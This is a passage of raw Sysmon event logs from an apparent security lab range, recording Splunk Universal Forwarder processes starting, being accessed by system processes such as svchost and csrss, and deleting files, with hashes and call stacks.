\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042088Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.926{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042087Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.926{FE4C2B44-D9F3-63C7-0500-00000000AF02}408424C:\Windows\system32\csrss.exe{FE4C2B44-E485-63C7-2A06-00000000AF02}5412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042086Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.926{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E485-63C7-2A06-00000000AF02}5412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042085Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.796{FE4C2B44-E485-63C7-2A06-00000000AF02}5412C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.2.5Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=92BD3C71158FA8B9A0821D43564A56E7,SHA256=7850C91F8D08679D7A0579D350C08CA6F6EDEA8A12226ADC2E30B4ABF8CE0BE2,IMPHASH=FD2D4472615B421BAEF1D51F46EF5F52{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000042084Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.561{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=061430371A53654BBA89CF6C95F42876,SHA256=A7B82E35459719677C3E089CFF3DC1878A428BC5B19F76D56579FB626CAA9B5B,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000016607Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E485-63C7-0402-00000000B002}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016606Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016605Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016604Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016603Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016602Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016601Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016600Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016599Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016598Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DC43-63C7-0C00-00000000B002}7283236C:\Windows\system32\svchost.exe{E5A8D418-DC44-63C7-1F00-00000000B002}1284C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000016597Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DC43-63C7-0500-00000000B002}416432C:\Windows\system32\csrss.exe{E5A8D418-E485-63C7-0402-00000000B002}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000016596Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.812{E5A8D418-DCC0-63C7-9F00-00000000B002}30963280C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{E5A8D418-E485-63C7-0402-00000000B002}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000016595Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.813{E5A8D418-E485-63C7-0402-00000000B002}2880C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.2.5Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{E5A8D418-DC43-63C7-E703-000000000000}0x3e70SystemMD5=611F936426EC989CDC9FB43B692D3CFA,SHA256=AF94FF9B82C4BF6F27A5695E741D2BDF06A6A574924179D0BC9E7B8A725882F5,IMPHASH=A2763C4BA6D4717F662584401724A6B2{E5A8D418-DCC0-63C7-9F00-00000000B002}3096C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016594Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.656{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD5F041A8D03CE5C0927DFA01D792D2D,SHA256=DCA2B201C4BB35C62497DC72AB6DEE42E4F522373551184222AD23F488D57460,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000042083Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.071{FE4C2B44-DA67-63C7-AE00-00000000AF02}49123668C:\Windows\system32\conhost.exe{FE4C2B44-E484-63C7-2906-00000000AF02}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8df|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042082Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.067{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042081Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.067{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042080Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.067{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042079Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.067{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832864C:\Windows\system32\svchost.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\KERNELBASE.dll+5ea44|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7b183|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+538bc|C:\Windows\System32\RPCRT4.dll+35824|C:\Windows\System32\RPCRT4.dll+3473d|C:\Windows\System32\RPCRT4.dll+34feb|C:\Windows\System32\RPCRT4.dll+20ddc|C:\Windows\System32\RPCRT4.dll+2125c|C:\Windows\System32\RPCRT4.dll+106bc|C:\Windows\System32\RPCRT4.dll+11f1b|C:\Windows\System32\RPCRT4.dll+1a50a|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x800000000000000042078Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.067{FE4C2B44-D9F3-63C7-0500-00000000AF02}408524C:\Windows\system32\csrss.exe{FE4C2B44-E484-63C7-2906-00000000AF02}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x800000000000000042077Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:29.067{FE4C2B44-DA67-63C7-AA00-00000000AF02}20924876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{FE4C2B44-E484-63C7-2906-00000000AF02}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7424|C:\Windows\System32\KERNELBASE.dll+24890|C:\Windows\System32\KERNELBASE.dll+22e56|C:\Windows\System32\KERNEL32.DLL+1c373|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+e499f1|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b3255|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd30d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1b59b6|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd3c14|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bd79a|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1c0f1c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd07d2|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dd491d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+1bb965|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+dc694e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x800000000000000042076Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:22:28.931{FE4C2B44-E484-63C7-2906-00000000AF02}5064C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{FE4C2B44-D9F3-63C7-E703-000000000000}0x3e70SystemMD5=679D3E04F6AB7B10FF27D06B29C27A12,SHA256=FF1B5220C99EA6173BE693E1C2D700873ADE2F8A73F503FC0D297EA0792756D1,IMPHASH=05D58741E22C6453F52C1A9326FAF02D{FE4C2B44-DA67-63C7-AA00-00000000AF02}2092C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x800000000000000016593Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.550{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\ApplicationMD5=658DFF6AFE1236C3B41E830EA02307FA,SHA256=1C95AFC84E7B8D458A577FD9AD7A5F85E009D21DE0CE3097D95701787FD7389E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000016592Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:22:29.137{E5A8D418-DCC0-63C7-A300-00000000B002}9683180C:\Windows\system32\conhost.exe{E5A8D418-E485-63C7-0302-00000000B002}1936C:\Program 